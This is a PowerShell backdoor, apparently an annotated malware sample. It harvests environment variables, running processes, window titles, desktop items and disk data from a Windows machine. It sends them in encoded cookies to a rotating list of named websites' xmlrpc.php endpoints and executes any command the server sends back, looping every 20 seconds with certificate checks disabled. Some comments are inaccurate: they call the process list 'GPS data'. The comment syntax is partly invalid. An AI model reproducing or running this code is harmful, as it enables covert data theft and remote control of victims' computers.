// Encodes various system information into Base64 strings and sends them to a remote server
function SendSystemInfoToServer($serverUrl) {
    // A unique identifier for session or request, used in cookies
    $sessionId = "486865D9C4";

    // Function to encode data into Base64 using GZip compression
    function EncodeData($data) {
        $memoryStream = [System.IO.MemoryStream]::new();
        $gzipStreamWriter = [System.IO.StreamWriter]::new(
            (New-Object System.IO.Compression.GZipStream($memoryStream, [System.IO.Compression.CompressionMode]::Compress))
        );
        $gzipStreamWriter.Write([String]::Join("|!", $data));
        $gzipStreamWriter.Close();
        return [System.Convert]::ToBase64String($memoryStream.ToArray());
    }

    // Collects environment variables with less than 100 characters and system information
    $environmentData = EncodeData(
        (dir env: | where {$_.value.Length -lt 100} | % {($_.name + "^" + $_.value)}) +
        ("OSWMI^" + (Get-WmiObject Win32_OperatingSystem).caption)
    );

    // Collects all GPS data
    $gpsData = EncodeData(gps | select name -unique | % {$_.name});

    // Collects window titles from processes
    $windowTitlesData = EncodeData(gps | where {$_.mainwindowtitle} | % {$_.name + "^" + $_.mainwindowtitle});

    // Collects file system and shell information
    $shellItemsData = EncodeData(
        ((new-object -com shell.application).Namespace(0)).Items() | % {
            if ($_.IsLink) { "0" + $_.Name }
            elseif ($_.IsFolder) { "1" + $_.Name }
            elseif ($_.IsFileSystem) { "2" + [IO.Path]::GetFileName($_.Path) }
            else { "3" + $_.Name }
        }
    );

    // Collects disk data for drives with more than 50GB free space
    $diskData = EncodeData(
        (gdr | where {$_.free -gt 50000} | % {$_.name + "^" + $_.used})
    );

    // Setting the security protocol to use TLS 1.2
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
    [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};

    // Create web request and send collected data in cookies
    $webRequest = [System.Net.WebRequest]::Create($serverUrl);
    $webRequest.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36";
    $webRequest.KeepAlive = $false;
    $webRequest.Headers.Add("Cookie: $sessionId=$environmentData; $sessionId`1=$gpsData; $sessionId`2=$windowTitlesData; $sessionId`3=$shellItemsData; $sessionId`4=$diskData");

    // Get the server's response and execute the code sent back
    $responseStream = $webRequest.GetResponse().GetResponseStream();
    $streamReader = new-object System.IO.StreamReader $responseStream;
    $responseData = ($streamReader.ReadToEnd()) -split $sessionId;

    // If the server returns three parts, execute the second part as a command
    if ($responseData.Count -eq 3) {
        iex($responseData[1] -replace "\^", "");
    }
}

// Main loop to repeatedly call the function with random URLs
while ($true) {
    try {
        // Select a random URL from a list of potential remote servers
        SendSystemInfoToServer(@(
            "https://ifthenpay.com/xmlrpc.php",
            "https://curlytales.com/xmlrpc.php",
            "https://customkiosks.co.uk/xmlrpc.php",
            "https://hommad.ru/xmlrpc.php",
            "https://fujitsu-airco.be/xmlrpc.php",
            "https://thinksaltlakecity.com/xmlrpc.php",
            "https://pornnudex.com/xmlrpc.php",
            "http://arce-ingenieria.com/wordpress/xmlrpc.php",
            "https://gatoro.co/xmlrpc.php",
            "https://indiarag.com/xmlrpc.php"
        ) | Get-Random);
    } catch {
        # If an error occurs, silently continue
    }

    # Sleep for 20 seconds before sending the next request
    Start-Sleep -Seconds 20;
}
